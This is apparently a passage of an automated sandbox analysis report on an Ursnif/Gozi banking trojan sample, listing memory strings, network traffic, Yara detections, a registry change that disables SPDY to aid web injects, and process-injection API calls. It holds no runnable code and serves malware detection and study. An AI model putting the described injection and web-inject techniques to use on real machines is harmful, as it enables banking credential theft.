Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: RuntimeBroker.exe, 00000027.00000002.578948445.000001E767B23000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/contact/
Source: RuntimeBroker.exe, 00000027.00000002.578948445.000001E767B23000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/parents/
Source: RuntimeBroker.exe, 00000027.00000002.578948445.000001E767B23000.00000004.00000001.sdmp String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: powershell.exe, 0000001A.00000002.447464468.0000028E4D040000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.449500265.0000028E4D3EF000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: RuntimeBroker.exe, 00000027.00000002.578594602.000001E767A41000.00000004.00000001.sdmp String found in binary or memory: https://instagram.com/hiddencity_
Source: powershell.exe, 0000001A.00000002.475950586.0000028E5D243000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000025.00000000.457476881.0000000008BB0000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 00000025.00000000.457290492.0000000008B68000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpMSN
Source: RuntimeBroker.exe, 00000027.00000002.578948445.000001E767B23000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/develop
Source: RuntimeBroker.exe, 00000027.00000002.578948445.000001E767B23000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/info/privacy
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49742 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.342289663.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342468816.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.578433552.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.570719578.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342346721.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.412411530.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342261211.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.422060985.0000021EAC2F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.422165478.0000028E65B80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.436183951.0000000000E50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.432265518.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342443739.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342379670.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.352943845.000000000519B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.574832418.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.437313666.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.589013804.00000000066DE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.474554725.00000000001CE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342460182.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342426080.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5236, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 4616, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6684, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.342289663.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342468816.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.578433552.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.570719578.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342346721.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.412411530.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342261211.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.422060985.0000021EAC2F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.422165478.0000028E65B80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.436183951.0000000000E50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.432265518.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342443739.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342379670.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.352943845.000000000519B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.574832418.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.437313666.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.589013804.00000000066DE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.474554725.00000000001CE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342460182.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342426080.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5236, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 4616, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6684, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000025.00000002.578433552.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000027.00000002.570719578.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000022.00000003.422060985.0000021EAC2F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000001A.00000003.422165478.0000028E65B80000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000025.00000003.432265518.0000000003070000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000026.00000002.574832418.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000025.00000000.437313666.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000025.00000002.589013804.00000000066DE000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000022.00000002.474554725.00000000001CE000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001C34D0 NtMapViewOfSection, 1_2_001C34D0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001C4F73 GetProcAddress,NtCreateSection,memset, 1_2_001C4F73
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001C11A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_001C11A9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001CB159 NtQueryVirtualMemory, 1_2_001CB159
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5CCD9 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 1_2_00E5CCD9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E75868 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset, 1_2_00E75868
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E60D8D memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 1_2_00E60D8D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5E529 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 1_2_00E5E529
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E6C6FE NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_00E6C6FE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E72AAC NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 1_2_00E72AAC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E55E8A NtQueryInformationProcess, 1_2_00E55E8A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E65E21 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 1_2_00E65E21
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E6FFF2 GetProcAddress,NtCreateSection,memset, 1_2_00E6FFF2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E577B0 NtMapViewOfSection, 1_2_00E577B0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E58F6D NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_00E58F6D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5F314 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_00E5F314
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5A818 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 1_2_00E5A818
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E605FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 1_2_00E605FC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E53934 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 1_2_00E53934
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E64518 NtGetContextThread,RtlNtStatusToDosError, 1_2_00E64518
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5E6C4 memset,NtQueryInformationProcess, 1_2_00E5E6C4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E52A0A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_00E52A0A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E72E10 NtQuerySystemInformation,RtlNtStatusToDosError, 1_2_00E72E10
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E617CD memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 1_2_00E617CD
Source: C:\Windows\System32\control.exe Code function: 34_2_001BC130 NtWriteVirtualMemory, 34_2_001BC130
Source: C:\Windows\System32\control.exe Code function: 34_2_001BF9A4 NtAllocateVirtualMemory, 34_2_001BF9A4
Source: C:\Windows\System32\control.exe Code function: 34_2_001A1A9C NtQueryInformationProcess, 34_2_001A1A9C
Source: C:\Windows\System32\control.exe Code function: 34_2_001B9B4C NtQueryInformationProcess, 34_2_001B9B4C
Source: C:\Windows\System32\control.exe Code function: 34_2_001A2BD8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 34_2_001A2BD8
Source: C:\Windows\System32\control.exe Code function: 34_2_0019C458 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 34_2_0019C458
Source: C:\Windows\System32\control.exe Code function: 34_2_001B9584 NtReadVirtualMemory, 34_2_001B9584
Source: C:\Windows\System32\control.exe Code function: 34_2_0019F640 NtQueryInformationToken,NtQueryInformationToken,NtClose, 34_2_0019F640
Source: C:\Windows\System32\control.exe Code function: 34_2_001B1EEC NtCreateSection, 34_2_001B1EEC
Source: C:\Windows\System32\control.exe Code function: 34_2_001AEF14 NtMapViewOfSection, 34_2_001AEF14
Source: C:\Windows\System32\control.exe Code function: 34_2_001D1004 NtProtectVirtualMemory,NtProtectVirtualMemory, 34_2_001D1004
Source: C:\Windows\explorer.exe Code function: 37_2_03B62BD8 NtSetInformationProcess,CreateRemoteThread,ResumeThread, 37_2_03B62BD8
Source: C:\Windows\explorer.exe Code function: 37_2_03B79B4C NtQueryInformationProcess, 37_2_03B79B4C
Source: C:\Windows\explorer.exe Code function: 37_2_03B7F9A4 NtAllocateVirtualMemory, 37_2_03B7F9A4
Source: C:\Windows\explorer.exe Code function: 37_2_03B7C130 NtWriteVirtualMemory, 37_2_03B7C130
Source: C:\Windows\explorer.exe Code function: 37_2_03B6EF14 NtMapViewOfSection, 37_2_03B6EF14
Source: C:\Windows\explorer.exe Code function: 37_2_03B71EEC NtCreateSection, 37_2_03B71EEC
Source: C:\Windows\explorer.exe Code function: 37_2_03B5F640 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose, 37_2_03B5F640
Source: C:\Windows\explorer.exe Code function: 37_2_03B79584 NtReadVirtualMemory, 37_2_03B79584
Source: C:\Windows\explorer.exe Code function: 37_2_03B51C74 NtQuerySystemInformation, 37_2_03B51C74
Source: C:\Windows\explorer.exe Code function: 37_2_03B5C458 NtSetContextThread,NtUnmapViewOfSection, 37_2_03B5C458
Source: C:\Windows\explorer.exe Code function: 37_2_03B91004 NtProtectVirtualMemory,NtProtectVirtualMemory, 37_2_03B91004
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E52410 CreateProcessAsUserW, 1_2_00E52410
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001C28E9 1_2_001C28E9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001CAF34 1_2_001CAF34
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E6808E 1_2_00E6808E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E6BC93 1_2_00E6BC93
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E7086C 1_2_00E7086C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E73C5C 1_2_00E73C5C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E64804 1_2_00E64804
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E71669 1_2_00E71669
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E62678 1_2_00E62678
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5BBA1 1_2_00E5BBA1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E6CFA3 1_2_00E6CFA3
Source: C:\Windows\System32\control.exe Code function: 34_2_001A5890 34_2_001A5890
Source: C:\Windows\System32\control.exe Code function: 34_2_001A6B80 34_2_001A6B80
Source: C:\Windows\System32\control.exe Code function: 34_2_0019C458 34_2_0019C458
Source: C:\Windows\System32\control.exe Code function: 34_2_001AE808 34_2_001AE808
Source: C:\Windows\System32\control.exe Code function: 34_2_001BE038 34_2_001BE038
Source: C:\Windows\System32\control.exe Code function: 34_2_001A2854 34_2_001A2854
Source: C:\Windows\System32\control.exe Code function: 34_2_001A386C 34_2_001A386C
Source: C:\Windows\System32\control.exe Code function: 34_2_001A206C 34_2_001A206C
Source: C:\Windows\System32\control.exe Code function: 34_2_001BE09C 34_2_001BE09C
Source: C:\Windows\System32\control.exe Code function: 34_2_001978F0 34_2_001978F0
Source: C:\Windows\System32\control.exe Code function: 34_2_001949BC 34_2_001949BC
Source: C:\Windows\System32\control.exe Code function: 34_2_001A11DC 34_2_001A11DC
Source: C:\Windows\System32\control.exe Code function: 34_2_001BFA10 34_2_001BFA10
Source: C:\Windows\System32\control.exe Code function: 34_2_001B6A28 34_2_001B6A28
Source: C:\Windows\System32\control.exe Code function: 34_2_001B0294 34_2_001B0294
Source: C:\Windows\System32\control.exe Code function: 34_2_001942CC 34_2_001942CC
Source: C:\Windows\System32\control.exe Code function: 34_2_001AAACC 34_2_001AAACC
Source: C:\Windows\System32\control.exe Code function: 34_2_001A0304 34_2_001A0304
Source: C:\Windows\System32\control.exe Code function: 34_2_00192B40 34_2_00192B40
Source: C:\Windows\System32\control.exe Code function: 34_2_001B2BD8 34_2_001B2BD8
Source: C:\Windows\System32\control.exe Code function: 34_2_0019EBD0 34_2_0019EBD0
Source: C:\Windows\System32\control.exe Code function: 34_2_001B53D4 34_2_001B53D4
Source: C:\Windows\System32\control.exe Code function: 34_2_001A3BF4 34_2_001A3BF4
Source: C:\Windows\System32\control.exe Code function: 34_2_001B9C04 34_2_001B9C04
Source: C:\Windows\System32\control.exe Code function: 34_2_001A3438 34_2_001A3438
Source: C:\Windows\System32\control.exe Code function: 34_2_001B1C68 34_2_001B1C68
Source: C:\Windows\System32\control.exe Code function: 34_2_001BD468 34_2_001BD468
Source: C:\Windows\System32\control.exe Code function: 34_2_0019DC88 34_2_0019DC88
Source: C:\Windows\System32\control.exe Code function: 34_2_001974A8 34_2_001974A8
Source: C:\Windows\System32\control.exe Code function: 34_2_001A44FC 34_2_001A44FC
Source: C:\Windows\System32\control.exe Code function: 34_2_00199514 34_2_00199514
Source: C:\Windows\System32\control.exe Code function: 34_2_001A1D14 34_2_001A1D14
Source: C:\Windows\System32\control.exe Code function: 34_2_001A7500 34_2_001A7500
Source: C:\Windows\System32\control.exe Code function: 34_2_00191D20 34_2_00191D20
Source: C:\Windows\System32\control.exe Code function: 34_2_001B0D40 34_2_001B0D40
Source: C:\Windows\System32\control.exe Code function: 34_2_001BED7C 34_2_001BED7C
Source: C:\Windows\System32\control.exe Code function: 34_2_0019559C 34_2_0019559C
